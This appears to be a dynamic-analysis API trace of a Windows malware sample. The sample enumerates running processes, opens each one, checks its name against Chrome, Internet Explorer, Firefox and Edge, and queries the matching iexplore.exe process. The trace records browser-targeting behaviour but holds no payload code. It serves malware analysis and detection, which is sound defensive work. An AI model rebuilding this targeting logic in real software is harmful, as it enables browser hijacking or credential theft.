	[0220.720] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.720] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4e94
	[0220.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.721] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.722] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.722] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0220.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4e98
	[0220.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.723] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.724] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.724] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.724] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0220.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4e9c
	[0220.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.726] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0220.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.727] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.727] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0220.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.727] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.728] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4ea0
	[0220.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.728] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.729] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.729] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.729] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0220.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4ea4
	[0220.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.730] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0220.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.731] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.731] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0220.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.731] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.732] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0220.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4ea8
	[0220.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.732] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0220.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.733] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.733] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0220.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.733] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.734] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0220.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4eac
	[0220.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.734] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0220.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.735] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.735] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0220.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.735] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0220.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4eb0
	[0220.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.736] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0220.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.736] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.737] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0220.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.737] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0220.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0220.738] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0220.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4eb4
	[0220.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.739] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0220.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.739] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.740] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0220.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.741] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.741] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0220.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4eb8
	[0220.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.742] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0220.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.743] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.743] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0220.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.743] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.743] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0220.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4ebc
	[0220.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.744] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0220.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.744] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.745] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0220.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.745] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0220.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4ec0
	[0220.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.746] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0220.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.746] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.747] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0220.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.747] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.747] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0220.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4ec4
	[0220.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.753] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0220.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.754] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.754] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0220.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.755] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.755] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0220.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4ec8
	[0220.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.756] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0220.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.756] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.757] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0220.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.757] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.757] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0220.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4ecc
	[0220.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.758] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0220.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.758] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.759] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0220.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.759] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.760] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0220.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4ed0
	[0220.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.760] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0220.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.761] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.761] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0220.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.762] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.762] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0220.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4ed4
	[0220.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.763] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0220.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.763] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.763] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0220.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.764] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.764] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0220.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4ed8
	[0220.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.765] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0220.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.765] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.765] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0220.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.765] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.765] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0220.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4edc
	[0220.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.766] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0220.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.767] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.767] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0220.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.768] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.768] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0220.769] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4ee0
	[0220.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.769] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0220.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.769] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.772] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0220.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.773] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.773] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0220.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4ee4
	[0220.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.774] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0220.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.775] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.775] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0220.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.776] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.776] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0220.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4ee8
	[0220.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.777] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0220.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.777] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.778] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0220.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.779] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.779] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0220.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4eec
	[0220.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.780] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0220.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.780] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.781] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0220.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.781] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.782] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0220.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4ef0
	[0220.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.783] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0220.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.783] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0220.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.783] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0220.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.784] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.784] NtQueryInformationProcess (in: ProcessHandle=0x4ef0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
